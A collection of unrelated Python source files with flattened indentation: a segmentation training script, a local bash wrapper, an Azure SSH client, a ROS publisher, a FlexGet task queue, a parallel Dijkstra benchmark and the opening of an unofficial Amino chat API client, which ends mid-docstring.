model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
print('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
# checkpoint_path = 'checkpoint_latest.pth.tar'
checkpoint_path = os.path.join(checkpoint_dir,'checkpoint_{}.pth.tar'.format(epoch))
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'prec1': prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % args.save_freq == 0:
history_path = os.path.join(checkpoint_dir, 'checkpoint_{:03d}.pth.tar'.format(epoch + 1))
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10
every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def crop_image(image, size):
left = (image.size[0] - size[0]) // 2
upper = (image.size[1] - size[1]) // 2
right = left + size[0]
lower = upper + size[1]
# print(left.item(), upper.item(), right.item(), lower.item())
return image.crop((left.item(), upper.item(), right.item(), lower.item()))
def save_output_images(predictions, filenames, output_dir, sizes=None):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_prob_images(prob, filenames, output_dir, sizes=None):
for ind in range(len(filenames)):
im = Image.fromarray(
(prob[ind][1].squeeze().data.cpu().numpy() * 255).astype(np.uint8))
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes, sizes=None):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
if sizes is not None:
im = crop_image(im, sizes[ind])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name, size) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
prob = torch.exp(final)
if save_vis:
save_output_images(pred, name, output_dir, size)
if prob.size(1) == 2:
save_prob_images(prob, name, output_dir + '_prob', size)
else:
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALLETE, size)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
print('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
print('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
ious = per_class_iu(hist) * 100
print(' '.join('{:.03f}'.format(i) for i in ious))
if has_gt: # val
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALLETE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: # val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
base_out_dir = args.checkpoint_dir
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = SegNet(args.classes)
# single_model = dla_up.__dict__.get(args.arch)(
# args.classes, down_ratio=args.down)
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = dataset.load_dataset_info(data_dir)
normalize = transforms.Normalize(mean=info.mean, std=info.std)
# scales = [0.5, 0.75, 1.25, 1.5, 1.75]
scales = [0.5, 0.75, 1.25, 1.5]
t = []
if args.crop_size > 0:
t.append(transforms.PadToSize(args.crop_size))
t.extend([transforms.ToTensor(), normalize])
if args.ms:
data = SegListMS(data_dir, phase, transforms.Compose(t), scales)
else:
data = SegList(data_dir, phase, transforms.Compose(t),
out_name=True, out_size=True,
binary=args.classes == 2)
test_loader = torch.utils.data.DataLoader(
data,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
out_dir = os.path.join(base_out_dir, '{}_{:03d}_{}'.format(args.arch, start_epoch, phase))
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
print('mAP: ', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(
description='DLA Segmentation and Boundary Prediction')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None)
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--train-samples', default=16000, type=int)
parser.add_argument('--loss', default='l1', type=str)
parser.add_argument('--test-batch-size', type=int, default=1000,
metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='- seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=1, metavar='N',
help='how many batches to wait before logging '
'training status')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained-base', default=None,
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--down', default=2, type=int, choices=[2, 4, 8, 16],
help='Downsampling ratio of IDA network output, which '
'is then upsampled to the original resolution '
'with bilinear interpolation.')
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--lr-mode', default='step')
parser.add_argument('--bn-sync', action='store_true', default=False)
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--random-color', action='store_true', default=False)
parser.add_argument('--save-freq', default=10, type=int)
parser.add_argument('--ms', action='store_true', default=False)
parser.add_argument('--edge-weight', type=int, default=-1)
parser.add_argument('--test-suffix', default='')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('-o', '--checkpoint-dir')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
assert args.data_dir is not None
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
return args
def main():
args = parse_args()
if not exists(args.checkpoint_dir):
os.makedirs(args.checkpoint_dir)
if args.bn_sync:
if HAS_BN_SYNC:
dla_up.set_bn(batchnormsync.BatchNormSync)
else:
print('batch normalization synchronization across GPUs '
'is not imported.')
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
basher.py
|
from subprocess import Popen, PIPE
from threading import Thread
SHELL = False
CMD = ['/bin/bash', '-i']
# CMD = ['/usr/local/bin/python3.7', '-i']
def main():
sub = Popen(CMD, stdin=PIPE, stdout=PIPE, stderr=PIPE, encoding='utf8')
def new_thread(stream, prefix):
def read():
line = '.'
while line or sub.poll() is None:
line = stream.readline().rstrip('\n')
print(prefix, line)
thread = Thread(target=read, daemon=True)
thread.start()
return thread
new_thread(sub.stdout, '.')
new_thread(sub.stderr, '!')
while True:
s = input(': ')
if s:
sub.stdin.write(s + '\n')
sub.stdin.flush()
else:
break
if __name__ == '__main__':
main()
|
acs_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import socket
import threading
from time import sleep
from os.path import expanduser, join, isfile
import paramiko
import paramiko.agent
from sshtunnel import SSHTunnelForwarder
from scp import SCPClient
from azure.cli.core.util import CLIError
from azure.cli.core.prompting import prompt_pass
def _load_key(key_filename):
pkey = None
try:
pkey = paramiko.RSAKey.from_private_key_file(key_filename, None)
except paramiko.PasswordRequiredException:
key_pass = prompt_pass('Password for private key:')
pkey = paramiko.RSAKey.from_private_key_file(key_filename, key_pass)
if pkey is None:
raise CLIError('failed to load key: {}'.format(key_filename))
return pkey
def _load_keys(key_filename=None, allow_agent=True):
keys = []
default_key_path = join(expanduser("~"), '.ssh', 'id_rsa')
if key_filename is not None:
key = _load_key(key_filename)
keys.append(key)
if allow_agent:
agent = paramiko.agent.Agent()
for key in agent.get_keys():
keys.append(key)
if not keys and isfile(default_key_path):
key = _load_key(default_key_path)
keys.append(key)
if not keys:
raise CLIError('No keys available in ssh agent or no key in {}. '
'Do you need to add keys to your ssh agent via '
'ssh-add or specify a --ssh-key-file?'.format(default_key_path))
return keys
def secure_copy(user, host, src, dest, key_filename=None, allow_agent=True):
keys = _load_keys(key_filename, allow_agent)
pkey = keys[0]
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, username=user, pkey=pkey)
scp = SCPClient(ssh.get_transport())
scp.get(src, dest)
scp.close()
class ACSClient(object):
def __init__(self, client=None):
self.client = client
self.transport = None
self.tunnel_server = None
self.host = None
self.username = None
self.port = None
def __del__(self):
if self.transport is not None:
self.transport.close()
if self.client is not None:
self.client.close()
if self.tunnel_server is not None:
self.tunnel_server.close_tunnel()
def connect(self, host, username, port=2200,
key_filename=None):
"""
Creates a connection to the remote server.
:param host: Remote host
:type host: String
:param username: User name to connect to the remote host
:type username: String
:param port: Remote host port
:type port: Number
"""
if not host:
raise ValueError('Host is missing')
if not username:
raise ValueError('Username is missing')
if not port:
raise ValueError('Missing port')
self.host = host
self.username = username
self.port = port
if self.client is None:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pkey = None
if key_filename is not None:
pkey = _load_key(key_filename)
self.client.connect(
hostname=host,
port=port,
username=username,
pkey=pkey)
self.transport = self.client.get_transport()
return self.transport is not None
def run(self, command, background=False):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
:param background: True to run it in a separate thread,
False should be run in the foreground
:type command: Boolean
"""
if background:
t = threading.Thread(target=ACSClient._run_cmd, args=(self, command))
t.daemon = True
t.start()
return
return self._run_cmd(command)
def _run_cmd(self, command):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
"""
if not command:
raise ValueError('Command is missing')
_, stdout, stderr = self.client.exec_command(command)
return stdout, stderr
def file_exists(self, file_path):
"""
Checks if file on the remote exists
:param file_path: Full path to the file on remote machine
:type file_path: String
"""
if not file_path:
raise ValueError('Missing file path')
if self.transport is None:
raise TypeError('Transport cannot be none')
sftp = self.transport.open_sftp_client()
result = None
try:
sftp.stat(file_path)
result = True
except IOError:
result = False
finally:
sftp.close()
return result
def create_tunnel(self, remote_host, remote_port, local_port=0):
"""
Creates a tunnel to the remote host
:param remote_host: Remote host to tunnel to
:type remote_host: String
:param remote_port: Remote port to tunnel to
:type remote_port: Number
:param local_port: Local port. If set to 0, random local port is selected
:type local_port: Number
"""
if local_port is 0:
local_port = self.get_available_local_port()
with SSHTunnelForwarder((self.host, self.port),
ssh_username=self.username,
remote_bind_address=(remote_host, remote_port),
local_bind_address=('0.0.0.0', local_port)):
try:
while True:
sleep(1)
except KeyboardInterrupt:
pass
@staticmethod
def get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
|
debug_publisher.py
|
#!/usr/bin/env python3
import threading
import rospy
from std_msgs.msg import Float64, Int32
from sensor_msgs.msg import JointState
class Control:
n = 0
def get_keyboard_input(self):
while(True):
inp = input("type something ")
#print("key: " + inp)
if(inp == "quit"):
return
self.n = int(inp)
def talker(c):
pub = rospy.Publisher('mv', Int32, queue_size=10)
rospy.init_node('mv', anonymous=True)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
cont = c.n
pub.publish(cont)
rate.sleep()
if __name__ == '__main__':
try:
c = Control()
x = threading.Thread(target=c.get_keyboard_input)
x.start()
talker(c)
except rospy.ROSInterruptException:
pass
|
task_queue.py
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
import logging
import queue
import sys
import threading
import time
from sqlalchemy.exc import ProgrammingError, OperationalError
from flexget.task import TaskAbort
log = logging.getLogger('task_queue')
class TaskQueue(object):
"""
Task processing thread.
Only executes one task at a time, if more are requested they are queued up and run in turn.
"""
def __init__(self):
self.run_queue = queue.PriorityQueue()
self._shutdown_now = False
self._shutdown_when_finished = False
self.current_task = None
# We don't override `threading.Thread` because debugging this seems unsafe with pydevd.
# Overriding __len__(self) seems to cause a debugger deadlock.
self._thread = threading.Thread(target=self.run, name='task_queue')
self._thread.daemon = True
def start(self):
self._thread.start()
def run(self):
while not self._shutdown_now:
# Grab the first job from the run queue and do it
try:
self.current_task = self.run_queue.get(timeout=0.5)
except queue.Empty:
if self._shutdown_when_finished:
self._shutdown_now = True
continue
try:
self.current_task.execute()
except TaskAbort as e:
log.debug('task %s aborted: %r' % (self.current_task.name, e))
except (ProgrammingError, OperationalError):
log.critical('Database error while running a task. Attempting to recover.')
self.current_task.manager.crash_report()
except Exception:
log.critical('BUG: Unhandled exception during task queue run loop.')
self.current_task.manager.crash_report()
finally:
self.run_queue.task_done()
self.current_task = None
remaining_jobs = self.run_queue.qsize()
if remaining_jobs:
log.warning('task queue shut down with %s tasks remaining in the queue to run.' % remaining_jobs)
else:
log.debug('task queue shut down')
def is_alive(self):
return self._thread.is_alive()
def put(self, task):
"""Adds a task to be executed to the queue."""
self.run_queue.put(task)
def __len__(self):
return self.run_queue.qsize()
def shutdown(self, finish_queue=True):
"""
Request shutdown.
:param bool finish_queue: Should all tasks be finished before ending thread.
"""
log.debug('task queue shutdown requested')
if finish_queue:
self._shutdown_when_finished = True
if self.run_queue.qsize():
log.verbose('There are %s tasks to execute. Shutdown will commence when they have completed.' %
self.run_queue.qsize())
else:
self._shutdown_now = True
def wait(self):
"""
Waits for the thread to exit.
Allows abortion of task queue with ctrl-c
"""
if sys.version_info >= (3, 4):
# Due to python bug, Thread.is_alive doesn't seem to work properly under our conditions on python 3.4+
# http://bugs.python.org/issue26793
# TODO: Is it important to have the clean abortion? Do we need to find a better way?
self._thread.join()
return
try:
while self._thread.is_alive():
time.sleep(0.5)
except KeyboardInterrupt:
log.error('Got ctrl-c, shutting down after running task (if any) completes')
self.shutdown(finish_queue=False)
# We still wait to finish cleanly, pressing ctrl-c again will abort
while self._thread.is_alive():
time.sleep(0.5)
|
dijk_inner_mp.py
|
import random
import time
import sys
import multiprocessing
from multiprocessing import Lock,Process,Semaphore,Barrier,Array,Queue
INT_MAX = multiprocessing.Value('i',1000000000)
#N=multiprocessing.Value('i',16384)
#DEG=multiprocessing.Value('i',16)
#P=multiprocessing.Value('i',2)
q = multiprocessing.Queue()
N1=int(sys.argv[2])
DEG1=int(sys.argv[3])
P1=int(sys.argv[1])
W = [[0 for x in range(DEG1)] for x in range(N1)]
W_index = [[0 for x in range(DEG1)] for x in range(N1)]
u = multiprocessing.Array('i',range(P1))
D = multiprocessing.Array('i',range(N1))
Q = multiprocessing.Array('i',range(N1))
l = [multiprocessing.Lock() for i in range(0,N1)]
INT_MAX1=1000000000
barrier = Barrier(P1)
local_min = multiprocessing.Array('i',range(P1))
def graph():
global W
global W_index
global P
global INT_MAX
global D
global Q
global u
global local_min
global l
for i in range(0,N1):
for j in range(0,DEG1):
W_index[i][j] = i+j
W[i][j] = i+j#random.randint(1,3)+i
if W_index[i][j] >= N1-1 :
W_index[i][j] = N1-1
#W[i][j] = N-1 random.randint(1, 10) + i
if i==i+j:
W[i][j]=0
#print (W[i][j], W_index[i][j])
#print (' ')
def array_init():
for i in range(0,N1):
D[i] = INT_MAX1
Q[i] = 1
D[0] = 0
def do_work(tid,D,Q,N,DEG,P,u):
start_time = time.time()
local_count=N.value
N=N.value
DEG=DEG.value
P=P.value
INT_MAX2=INT_MAX.value
u[tid]=0
i_start = tid*DEG/P
i_stop = (tid+1)*DEG/P
barrier.wait()
while local_count!=0: #outer loop
min1 = INT_MAX2
min_index1 = N-1
for j in range(int(i_start),int(i_stop)): #local_min
if(D[W_index[u[tid]][j]] < min1 and Q[W_index[u[tid]][j]]==1): #inner loop
min1 = D[W_index[u[tid]][j]]
min_index1 = W_index[u[tid]][j]
local_min[tid]=min_index1
barrier.wait() #barrier
if tid==0 :
min2=INT_MAX2
min_index2=N-1
for k in range(0,P):
if D[local_min[k]] < min2 and Q[local_min[k]]==1:
min2 = D[local_min[k]]
min_index2 = local_min[k]
u[tid]=min_index2;
Q[u[tid]]=0
barrier.wait()
if tid!=0:
u[tid]=u[0]
for i in range(int(i_start),int(i_stop)):
if(D[W_index[u[tid]][i]] > D[u[tid]] + W[u[tid]][i]):
D[W_index[u[tid]][i]] = D[u[tid]] + W[u[tid]][i] #relax
local_count = local_count - 1
final_time = time.time() - start_time
print ('TID:',tid,'TIME_SEC',final_time)
strr0 = "inner/inner"
strr1 = str(P)
strr11 = str(N)
strr12 = str(DEG)
strr2 = ".out"
strr3 = "-"
strr_final = strr0 + strr3 + strr1 + strr3 + strr11 + strr3 + strr12 + strr2
f = open(strr_final,'w')
f.write(str(final_time))
f.close
#if tid==0:
# for i in range(0,N):
# print (D[i],Q[i])
def main():
graph()
array_init()
P11 = int(sys.argv[1])
N11 = int(sys.argv[2])
DEG11 = int(sys.argv[3])
print (P11)
P1 = P11
N1 = N11
DEG1 = DEG11
P = multiprocessing.Value('i',P11)
N = multiprocessing.Value('i',N11)
DEG = multiprocessing.Value('i',DEG11)
for i in range(1,P1):
p = Process(target=do_work,args=(i,D,Q,N,DEG,P,u))
p.start()
do_work(0,D,Q,N,DEG,P,u)
for i in range(1,P1):
p.join()
if __name__ == "__main__":
main()
|
client.py
|
import json
import base64
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
self.device_id_sig = device.device_id_sig
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
self.check_device(device.device_id)
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType])
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.start()
self.run_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/login", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.start()
return response.status_code
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/register", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/account/delete-request/cancel", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/logout", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType
if age <= 12: raise exceptions.AgeTooLow
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
